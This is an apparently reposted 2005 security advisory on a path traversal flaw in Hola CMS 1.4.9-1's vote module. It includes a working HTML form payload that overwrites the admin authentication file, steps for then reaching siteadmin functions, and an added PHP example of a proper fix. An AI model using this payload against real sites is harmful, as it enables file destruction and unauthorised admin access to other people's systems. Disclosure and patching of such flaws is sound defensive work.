Virginity Security Advisory 2005-002 : Hola CMS - Another File destruction and System access

Type securityvulns
Reporter Securityvulns
Modified 2005-03-16T00:00:00


Virginity Security Advisory 2005-002

         DATE : 2005-03-13 15:11 GMT
         TYPE : remote

VERSIONS AFFECTED : hola-cms-1.4.9-1
           AUTHOR : Virginity
  ADVISORY NUMBER : 004


Like the one in SA-2005-001: A new patched version, 1.4.9-1, was released in which that issue was marked as solved. The vote module (vote_save_results.php) now checks with strpos() whether the submitted "vote_filename" variable contains "holaDB/votes" at position 0.

BUT! Since we all know how to change directories by typing ../, we can still manipulate or destroy every file on the whole server simply by sending "vote_filename=holaDB/votes/../../[anything we want]"!!! Below is the updated example of how to destroy the login authentication file and gain access to the admin functions!

Really sad that the quick patch (released 3? hours after notification) doesn't really work.

Author of the Software has been notified.


Create this HTML form (it makes it easier to use on multiple targets):

<form action="http://[target]/[site-with-vote].php?vote=1" method="POST">
  <input type="hidden" name="vote_filename" value="holaDB/votes/../../admin/multiuser/multiuser.php">
  <input type="hidden" name="result" value="0">
  <input type="submit" value="Stimme abgeben" name="button">
</form>

Of course you'll have to edit [target] and [site-with-vote] to match your site! Now when you push the button, the first lines of multiuser.php (which includes the authentication mechanism) get overwritten, and by calling http://[target]/admin/index_cms.php you have access to all user functions. By calling http://[target]/admin/[module you want].php?username=siteadmin you get all siteadmin functions!


Use another CMS... I think PHP-Nuke isn't that vulnerable ;)
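What a real fix for the check looks like, as an added example that is not Hola CMS code: the strpos() prefix test described above, beside a version that never lets the client choose a path, and a containment check for code that must still accept one. VOTES_DIR and the function names are assumptions for this example.

```php
<?php
// Added example, not Hola CMS code: the prefix-only check the advisory
// describes next to checks that do not trust a client-supplied path.

// Directory the vote module is allowed to write to (location assumed here).
define('VOTES_DIR', __DIR__ . '/holaDB/votes');

// The 1.4.9-1 style check: only the string prefix is tested, so a value such
// as "holaDB/votes/../../admin/multiuser/multiuser.php" passes, and the "../"
// segments walk out of the directory when the file is actually opened.
function vote_filename_is_allowed_weak(string $vote_filename): bool
{
    return strpos($vote_filename, 'holaDB/votes') === 0;
}

// Hardened version: the client supplies only a bare identifier made of safe
// characters and the server builds the path itself. null means "reject the
// request"; no directory separator or ".." can ever reach the filesystem.
function vote_result_path(string $vote_id): ?string
{
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $vote_id) !== 1) {
        return null;
    }
    return VOTES_DIR . '/' . $vote_id . '.txt';
}

// Defence in depth for code that must still take a path: resolve the parent
// directory (the result file may not exist yet) and require that it is
// exactly VOTES_DIR. realpath() collapses "../" and symlinks, so the prefix
// trick from the advisory no longer matches.
function vote_path_is_inside_votes_dir(string $path): bool
{
    $dir    = realpath(VOTES_DIR);
    $parent = realpath(dirname($path));
    $name   = basename($path);
    if ($dir === false || $parent === false
        || $name === '' || $name === '.' || $name === '..') {
        return false; // unknown directory or no usable file name: refuse to write
    }
    return $parent === $dir;
}

// Run the advisory's payload and a legitimate identifier through each check.
$payload = 'holaDB/votes/../../admin/multiuser/multiuser.php';
var_dump(vote_filename_is_allowed_weak($payload));
var_dump(vote_result_path($payload));
var_dump(vote_result_path('poll_2005_03'));
var_dump(vote_path_is_inside_votes_dir($payload));
```

Only the weak check accepts the payload; the other two functions reject it while still allowing a plain identifier that maps to a file inside holaDB/votes.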

Personal note:

YES! The girl did it again :) Contact me on IRC!